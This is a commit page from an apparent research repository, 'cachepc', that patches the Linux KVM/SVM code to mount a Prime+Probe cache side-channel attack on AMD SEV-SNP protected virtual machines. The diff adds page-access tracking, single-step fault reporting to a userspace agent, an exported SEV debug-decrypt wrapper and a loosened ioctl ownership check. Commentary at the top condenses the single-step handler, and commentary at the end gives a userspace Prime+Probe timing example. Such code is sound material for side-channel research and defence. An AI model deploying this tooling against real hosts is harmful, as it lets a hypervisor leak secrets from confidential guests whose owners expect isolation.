cachepc

Prime+Probe cache-based side-channel attack on AMD SEV-SNP protected virtual machines
git clone https://git.sinitax.com/sinitax/cachepc

commit 23d13c916961d7a1e01dc46d363df82cfb7bb86a
parent 6907b53a850bde2faaa9c2c9342501b775008721
Author: Louis Burda <quent.burda@gmail.com>
Date:   Tue, 15 Nov 2022 14:38:32 +0100

Update kernel source patch

Diffstat:
M patch.diff | 193 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++--------------------
1 file changed, 144 insertions(+), 49 deletions(-)
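
This revision mostly renames the sevstep_*/uspt helpers to cachepc_* tracking/event names (sevstep.o/uspt.o become tracking.o/events.o) and adds logging. The control flow worth understanding is the single-step handler the patch places in intr_interception() in svm.c; condensed from that hunk (error paths elided, this restates the diff below rather than adding new behavior):

    if (cachepc_track_mode == CPC_TRACK_DATA_ACCESS && cachepc_single_step) {
            cachepc_single_step = false;
            if (cachepc_data_fault_avail) {
                    /* report the (instruction, data) fault pair to the
                     * userspace agent; judging by the old helper name
                     * (sevstep_uspt_send_and_block) this blocks until the
                     * event is acknowledged */
                    cachepc_send_tracking_event(
                            cachepc_inst_fault_gfn, cachepc_inst_fault_err,
                            cachepc_data_fault_gfn, cachepc_data_fault_err);
                    /* re-arm access tracking on both pages so the next
                     * guest instruction faults and single-steps again */
                    cachepc_track_single(vcpu, cachepc_data_fault_gfn,
                            KVM_PAGE_TRACK_ACCESS);
                    cachepc_track_single(vcpu, cachepc_inst_fault_gfn,
                            KVM_PAGE_TRACK_ACCESS);
            }
    }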

diff --git a/patch.diff b/patch.diff
@@ -17,7 +17,7 @@ index eb186bc57f6a..b96e80934005 100644
 /*
  * The notifier represented by @kvm_page_track_notifier_node is linked into
 diff --git a/arch/x86/kvm/Makefile b/arch/x86/kvm/Makefile
-index 30f244b64523..568cc761f0e5 100644
+index 30f244b64523..c75819a6cd77 100644
 --- a/arch/x86/kvm/Makefile
 +++ b/arch/x86/kvm/Makefile
 @@ -1,6 +1,6 @@
@@ -36,7 +36,7 @@ index 30f244b64523..568cc761f0e5 100644

-	mmu/spte.o
+	hyperv.o debugfs.o mmu/mmu.o mmu/page_track.o mmu/spte.o \
+	cachepc/cachepc.o cachepc/kvm.o \
-+	cachepc/sevstep.o cachepc/uspt.o
++	cachepc/tracking.o cachepc/events.o

 ifdef CONFIG_HYPERV
 kvm-y += kvm_onhyperv.o
@@ -46,7 +46,7 @@ index 30f244b64523..568cc761f0e5 100644

-kvm-amd-y += svm/svm.o svm/vmenter.o svm/pmu.o svm/nested.o svm/avic.o svm/sev.o
+kvm-amd-y += svm/svm.o svm/vmenter.o svm/pmu.o svm/nested.o \
-+	svm/avic.o svm/sev.o cachepc/cachepc.o cachepc/uspt.o
++	svm/avic.o svm/sev.o cachepc/cachepc.o cachepc/events.o

 ifdef CONFIG_HYPERV
 kvm-amd-y += svm/svm_onhyperv.o
@@ -59,7 +59,7 @@ index 000000000000..9119e44af1f0
+/home/louis/kvm-prime-count/cachepc
\ No newline at end of file
 diff --git a/arch/x86/kvm/mmu/mmu.c b/arch/x86/kvm/mmu/mmu.c
-index d871b8dee7b3..bfeab994420e 100644
+index d871b8dee7b3..317dcb165e92 100644
 --- a/arch/x86/kvm/mmu/mmu.c
 +++ b/arch/x86/kvm/mmu/mmu.c
 @@ -1152,6 +1152,8 @@ static void drop_large_spte(struct kvm_vcpu *vcpu, u64 *sptep)
@@ -93,7 +93,7 @@ index d871b8dee7b3..bfeab994420e 100644
 -}
 +// static bool spte_write_protect(u64 *sptep, bool pt_protect)
 +// {
-+// 	return sevstep_spte_protect(sptep, pt_protect, KVM_PAGE_TRACK_WRITE);
++// 	return cachepc_spte_protect(sptep, pt_protect, KVM_PAGE_TRACK_WRITE);
 +// }

 static bool rmap_write_protect(struct kvm_rmap_head *rmap_head,
@@ -107,7 +107,7 @@ index d871b8dee7b3..bfeab994420e 100644
 -		flush |= spte_write_protect(sptep, pt_protect);
 -
 -	return flush;
-+	return sevstep_rmap_protect(rmap_head, pt_protect, KVM_PAGE_TRACK_WRITE);
++	return cachepc_rmap_protect(rmap_head, pt_protect, KVM_PAGE_TRACK_WRITE);
 }

 static bool spte_clear_dirty(u64 *sptep)
@@ -131,7 +131,7 @@ index d871b8dee7b3..bfeab994420e 100644
 -		kvm_tdp_mmu_write_protect_gfn(kvm, slot, gfn, min_level);
 -
 -	return write_protected;
-+	return sevstep_kvm_mmu_slot_gfn_protect(kvm, slot,
++	return cachepc_kvm_mmu_slot_gfn_protect(kvm, slot,
 +		gfn, min_level, KVM_PAGE_TRACK_WRITE);
 }

@@ -146,7 +146,7 @@ index d871b8dee7b3..bfeab994420e 100644
 -	if (!fault->present || !fault->write)
 -		return false;
-+	sevstep_uspt_page_fault_handle(vcpu, fault);
++	cachepc_uspt_page_fault_handle(vcpu, fault);

 	/*
 	 * guest is writing the page which is write tracked which can
@@ -169,14 +169,14 @@ index d871b8dee7b3..bfeab994420e 100644
 	return false;
 }
 diff --git a/arch/x86/kvm/mmu/page_track.c b/arch/x86/kvm/mmu/page_track.c
-index 2e09d1b6249f..fb17064b5d53 100644
+index 2e09d1b6249f..02821df27f51 100644
 --- a/arch/x86/kvm/mmu/page_track.c
 +++ b/arch/x86/kvm/mmu/page_track.c
 @@ -19,6 +19,8 @@
 #include "mmu.h"
 #include "mmu_internal.h"
-+#include "../cachepc/sevstep.h"
++#include "../cachepc/tracking.h"
+
 bool kvm_page_track_write_tracking_enabled(struct kvm *kvm)
 {
@@ -193,7 +193,7 @@ index 2e09d1b6249f..fb17064b5d53 100644
 	!kvm_page_track_write_tracking_enabled(kvm)))
 	return;
-+	//pr_warn("CachePCTest: Tracking page: %llu\n", gfn);
++	pr_warn("CachePC: Tracking page: %llu\n", gfn);
+
 	update_gfn_track(slot, gfn, mode, 1);

@@ -205,15 +205,24 @@ index 2e09d1b6249f..fb17064b5d53 100644
-	if (mode == KVM_PAGE_TRACK_WRITE)
-		if (kvm_mmu_slot_gfn_write_protect(kvm, slot, gfn, PG_LEVEL_4K))
-			kvm_flush_remote_tlbs(kvm);
-+	if (sevstep_kvm_mmu_slot_gfn_protect(kvm,
++	if (cachepc_kvm_mmu_slot_gfn_protect(kvm,
+			slot, gfn, PG_LEVEL_4K, mode)) {
+		kvm_flush_remote_tlbs(kvm);
+	}
 }
 EXPORT_SYMBOL_GPL(kvm_slot_page_track_add_page);
+@@ -161,6 +165,8 @@ void kvm_slot_page_track_remove_page(struct kvm *kvm,
+	!kvm_page_track_write_tracking_enabled(kvm)))
+	return;
+
++	pr_warn("CachePC: Untracking page: %llu\n", gfn);
++
+	update_gfn_track(slot, gfn, mode, -1);
+
+	/*
 diff --git a/arch/x86/kvm/mmu/tdp_mmu.c b/arch/x86/kvm/mmu/tdp_mmu.c
-index 7b9265d67131..ba7af6bcc33e 100644
+index 7b9265d67131..68b9134970da 100644
 --- a/arch/x86/kvm/mmu/tdp_mmu.c
 +++ b/arch/x86/kvm/mmu/tdp_mmu.c
 @@ -1810,13 +1810,8 @@ void kvm_tdp_mmu_zap_collapsible_sptes(struct kvm *kvm,
-/*
- * Removes write access on the last level SPTE mapping this GFN and unsets the
- * MMU-writable bit to ensure future writes continue to be intercepted.
- */
-static bool write_protect_gfn(struct kvm *kvm, struct kvm_mmu_page *root,
-	gfn_t gfn, int min_level)
+static bool cachepc_protect_gfn(struct kvm *kvm, struct kvm_mmu_page *root,
+	gfn_t gfn, int min_level, int mode)
 {
 	struct tdp_iter iter;
 	u64 new_spte;
@@ -1831,8 +1826,14 @@ static bool write_protect_gfn(struct kvm *kvm, struct kvm_mmu_page *root,
 	!is_last_spte(iter.old_spte, iter.level))
 	continue;

-	new_spte = iter.old_spte &
-		~(PT_WRITABLE_MASK | shadow_mmu_writable_mask);
-+	//pr_warn("Sevstep: tdp_protect_gfn\n");
+	new_spte = iter.old_spte & ~shadow_mmu_writable_mask;
+	new_spte &= ~PT_WRITABLE_MASK;
+	if (mode == KVM_PAGE_TRACK_ACCESS) {
+		new_spte &= ~PT_PRESENT_MASK;
+	}

 	if (new_spte == iter.old_spte)
 		break;
@@ -1846,6 +1846,58 @@ static bool write_protect_gfn(struct kvm *kvm, struct kvm_mmu_page *root,
 	return spte_set;
 }

+bool cachepc_tdp_protect_gfn(struct kvm *kvm, struct kvm_memory_slot *slot,
+	gfn_t gfn, int min_level, int mode)
+{
+	struct kvm_mmu_page *root;
+	bool spte_set = false;
+
+	lockdep_assert_held_write(&kvm->mmu_lock);
+	for_each_tdp_mmu_root(kvm, root, slot->as_id)
+		spte_set |= cachepc_protect_gfn(kvm, root, gfn, min_level, mode);
+
+	return spte_set;
+}
+EXPORT_SYMBOL(cachepc_tdp_protect_gfn);
+
+/*
+ * Removes write access on the last level SPTE mapping this GFN and unsets the
 /*
  * Removes write access on the last level SPTE mapping this GFN and unsets the
  * MMU-writable bit to ensure future writes continue to be intercepted.
-@@ -1855,14 +1908,16 @@ bool kvm_tdp_mmu_write_protect_gfn(struct kvm *kvm,
+@@ -1855,14 +1907,17 @@ bool kvm_tdp_mmu_write_protect_gfn(struct kvm *kvm,
 	struct kvm_memory_slot *slot, gfn_t gfn, int min_level)
 {
-	struct kvm_mmu_page *root;
-	bool spte_set = false;
+	return cachepc_tdp_protect_gfn(kvm, slot, gfn, min_level,
+		KVM_PAGE_TRACK_WRITE);
+	// struct kvm_mmu_page *root;
+	// bool spte_set = false;

-	lockdep_assert_held_write(&kvm->mmu_lock);
-	for_each_tdp_mmu_root(kvm, root, slot->as_id)
-		spte_set |= write_protect_gfn(kvm, root, gfn, min_level);

-	return spte_set;
+	// lockdep_assert_held_write(&kvm->mmu_lock);
+	// for_each_tdp_mmu_root(kvm, root, slot->as_id)
+	// 	spte_set |= write_protect_gfn(kvm, root, gfn, min_level);
+
+	// return spte_set;
 }

 /*
diff --git a/arch/x86/kvm/svm/sev.c b/arch/x86/kvm/svm/sev.c
index a4f6d10b0ef3..a1ac048b35cf 100644
--- a/arch/x86/kvm/svm/sev.c
+++ b/arch/x86/kvm/svm/sev.c
@@ -888,7 +888,7 @@ static int __sev_issue_dbg_cmd(struct kvm *kvm, unsigned long src,
 	&data, error);
 }

-static int __sev_dbg_decrypt(struct kvm *kvm, unsigned long src_paddr,
+int __sev_dbg_decrypt(struct kvm *kvm, unsigned long src_paddr,
 	unsigned long dst_paddr, int sz, int *err)
 {
 	int offset;
@@ -904,6 +904,13 @@ static int __sev_dbg_decrypt(struct kvm *kvm, unsigned long src_paddr,
 	return __sev_issue_dbg_cmd(kvm, src_paddr, dst_paddr, sz, err, false);
 }

+
+int sev_dbg_decrypt_ext(struct kvm *kvm, unsigned long src_paddr,
+	unsigned long dst_paddr, int sz, int *err) {
+	return __sev_dbg_decrypt(kvm, src_paddr, dst_paddr, sz, err);
+}
+EXPORT_SYMBOL(sev_dbg_decrypt_ext);
+
 static int __sev_dbg_decrypt_user(struct kvm *kvm, unsigned long paddr,
 	void __user *dst_uaddr,
 	unsigned long dst_paddr,
@@ -1026,6 +1033,8 @@ static int sev_dbg_crypt(struct kvm *kvm, struct kvm_sev_cmd *argp, bool dec)
 	unsigned int size;
 	int ret;

+	pr_warn("DEBUG CRYPT\n");
+
 	if (!sev_guest(kvm))
 		return -ENOTTY;

diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
index cf0bf456d520..4134049e6b08 100644
--- a/arch/x86/kvm/svm/svm.c
+++ b/arch/x86/kvm/svm/svm.c
@@ -2,6 +2,10 @@

 #include <linux/kvm_host.h>
+#include "cachepc/cachepc.h"
+#include "cachepc/events.h"
+#include "cachepc/tracking.h"
+
 #include "irq.h"
 #include "mmu.h"
 #include "kvm_cache_regs.h"
@@ -2083,6 +2087,38 @@ static int smi_interception(struct kvm_vcpu *vcpu)

 static int intr_interception(struct kvm_vcpu *vcpu)
 {
+	if (cachepc_track_mode == CPC_TRACK_DATA_ACCESS && cachepc_single_step) {
+		cachepc_single_step = false;
+
+		if (cachepc_data_fault_avail) {
+			pr_warn("CachePC: Caught single step WITH data!\n");
+
+			cachepc_send_tracking_event(
+				cachepc_inst_fault_gfn, cachepc_inst_fault_err,
+				cachepc_data_fault_gfn, cachepc_data_fault_err);
+
+			cachepc_track_single(vcpu, cachepc_data_fault_gfn,
+				KVM_PAGE_TRACK_ACCESS);
+			cachepc_data_fault_avail = false;
+
+			cachepc_track_single(vcpu, cachepc_inst_fault_gfn,
+				KVM_PAGE_TRACK_ACCESS);
+			cachepc_inst_fault_avail = false;
+		} else if (cachepc_inst_fault_avail) {
+			pr_warn("CachePC: Caught single step WITHOUT data!\n");
+
+			cachepc_send_tracking_event(
+				cachepc_inst_fault_gfn, cachepc_inst_fault_err,
+				0, 0);
+
+			cachepc_track_single(vcpu, cachepc_inst_fault_gfn,
+				KVM_PAGE_TRACK_ACCESS);
+			cachepc_inst_fault_avail = false;
+		} else {
+			pr_err("CachePC: Unexpected single step\n");
+		}
+	}
+
 	++vcpu->stat.irq_exits;
 	return 1;
 }

@@ -3269,9 +3305,23 @@ static int svm_handle_invalid_exit(struct kvm_vcpu *vcpu, u64 exit_code)

 int svm_invoke_exit_handler(struct kvm_vcpu *vcpu, u64 exit_code)
 {
+	static const struct {
+		u64 code;
+		const char *name;
+	} codelut[] = {
+		SVM_EXIT_REASONS,
+		{ -1, NULL }
+	};
+	size_t i;
+
 	if (!svm_check_exit_valid(exit_code))
 		return svm_handle_invalid_exit(vcpu, exit_code);

+	for (i = 0; i < sizeof(codelut) / sizeof(codelut[0]); i++) {
+		if (codelut[i].code == exit_code)
+			pr_warn("KVM EXIT (%s)\n", codelut[i].name);
+	}
+
 #ifdef CONFIG_RETPOLINE
 	if (exit_code == SVM_EXIT_MSR)
 		return msr_interception(vcpu);
@@ -3788,14 +3838,39 @@ static noinstr void svm_vcpu_enter_exit(struct kvm_vcpu *vcpu)
 {
 	struct vcpu_svm *svm = to_svm(vcpu);
 	unsigned long vmcb_pa = svm->current_vmcb->pa;

 	/*
 	 * Use a single vmcb (vmcb01 because it's always valid) for
 	 * context switching guest state via VMLOAD/VMSAVE, that way
@@ -3806,7 +3863,15 @@ static noinstr void svm_vcpu_enter_exit(struct kvm_vcpu *vcpu)
 	__svm_vcpu_run(vmcb_pa, (unsigned long *)&vcpu->arch.regs);
 	vmsave(svm->vmcb01.pa);

diff --git a/arch/x86/kvm/svm/vmenter.S b/arch/x86/kvm/svm/vmenter.S
index dfaeb47fcf2a..0626f3fdddfd 100644
--- a/arch/x86/kvm/svm/vmenter.S
+++ b/arch/x86/kvm/svm/vmenter.S
 2:	cli

diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
index d9adf79124f9..6ca86ab417cb 100644
--- a/arch/x86/kvm/x86.c
+++ b/arch/x86/kvm/x86.c
@@ -82,6 +82,8 @@

 #define CREATE_TRACE_POINTS
 #include "trace.h"

@@ -6597,6 +6599,7 @@ long kvm_arch_vm_ioctl(struct file *filp,
 	if (!kvm_x86_ops.mem_enc_ioctl)
 		goto out;

+	pr_warn("ENCRYPT_OP\n");
 	r = static_call(kvm_x86_mem_enc_ioctl)(kvm, argp);
 	break;
 }
diff --git a/crypto/aes_generic.c b/crypto/aes_generic.c
index 27ab27931813..90679ec8ba79 100644
--- a/crypto/aes_generic.c
+++ b/crypto/aes_generic.c
index e089fbf9017f..7899e1efe852
 static int __sev_init_locked(int *error)
 {
diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
index f2a63cb2658b..c77a29e14771 100644
--- a/virt/kvm/kvm_main.c
+++ b/virt/kvm/kvm_main.c
@@ -13,6 +13,7 @@
 */

 #include <kvm/iodev.h>

 #include <linux/kvm_host.h>
@@ -64,12 +65,15 @@

 #define CREATE_TRACE_POINTS
 #include <trace/events/kvm.h>
+#include "../../arch/x86/kvm/cachepc/tracking.h"

 #include <linux/kvm_dirty_ring.h>

 /* Worst case buffer size needed for holding an integer. */
 #define ITOA_MAX_LEN 12

+#include "../../arch/x86/kvm/cachepc/kvm.h"
+
 MODULE_AUTHOR("Qumranet");
 MODULE_LICENSE("GPL");
@@ -1261,6 +1265,9 @@ static void kvm_destroy_vm(struct kvm *kvm)
 	hardware_disable_all();
 	mmdrop(mm);
 	module_put(kvm_chardev_ops.owner);
+
+	main_vm = NULL;
+
 }

 void kvm_get_kvm(struct kvm *kvm)
@@ -1360,7 +1367,7 @@ static void kvm_insert_gfn_node(struct kvm_memslots *slots,
 	int idx = slots->node_idx;

 	parent = NULL;
-	while (*node) {
+	while (*node) {
 		struct kvm_memory_slot *tmp;

 		tmp = container_of(*node, struct kvm_memory_slot, gfn_node[idx]);
@@ -4514,7 +4521,7 @@ static long kvm_vm_ioctl(struct file *filp,
 	void __user *argp = (void __user *)arg;
 	int r;

-	if (kvm->mm != current->mm || kvm->vm_dead)
+	if ((ioctl != KVM_MEMORY_ENCRYPT_OP && kvm->mm != current->mm) || kvm->vm_dead)
 		return -EIO;
 	switch (ioctl) {
 	case KVM_CREATE_VCPU:
@@ -4823,6 +4830,9 @@ static int kvm_dev_ioctl_create_vm(unsigned long type)
 	kvm_uevent_notify_change(KVM_EVENT_CREATE_VM, kvm);
 	fd_install(r, file);
+
+	main_vm = kvm;
+
 	return r;

put_kvm:
@@ -4864,7 +4874,7 @@ static long kvm_dev_ioctl(struct file *filp,
 		r = -EOPNOTSUPP;
 		break;
 	default:
-		return kvm_arch_dev_ioctl(filp, ioctl, arg);
+		return cachepc_kvm_ioctl(filp, ioctl, arg);
 	}
out:
 	return r;
@@ -5792,6 +5802,8 @@ int kvm_init(void *opaque, unsigned vcpu_size, unsigned vcpu_align,
 	r = kvm_vfio_ops_init();
 	WARN_ON(r);

+	cachepc_kvm_init();
+
 	return 0;

out_unreg:
@@ -5821,6 +5833,8 @@ void kvm_exit(void)
 {
 	int cpu;
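
For orientation, the measurement primitive all of the hooks above serve is the classic Prime+Probe named in the repository description: fill one L1D cache set with attacker-owned lines, let the guest execute a single instruction, then time reloads to see which lines the guest evicted. A hypothetical, self-contained userspace illustration of the primitive follows — the in-kernel module measures with performance counters rather than rdtscp, and the names, associativity and stride constants here are illustrative assumptions, not the module's API:

    #include <stdint.h>
    #include <x86intrin.h>

    #define WAYS   8      /* assumed L1D associativity */
    #define STRIDE 4096   /* 64 sets x 64-byte lines: same-set stride */

    static uint8_t evset[WAYS * STRIDE] __attribute__((aligned(4096)));

    /* Prime: load every way of one cache set with our own lines. */
    static void prime(void)
    {
            for (int way = 0; way < WAYS; way++)
                    *(volatile uint8_t *)&evset[way * STRIDE];
    }

    /* Probe: time one reload; a slow access means the victim touched
     * this set in the meantime and evicted our line. */
    static uint64_t probe(int way)
    {
            unsigned int aux;
            uint64_t t0, t1;

            t0 = __rdtscp(&aux);
            *(volatile uint8_t *)&evset[way * STRIDE];
            t1 = __rdtscp(&aux);
            return t1 - t0;
    }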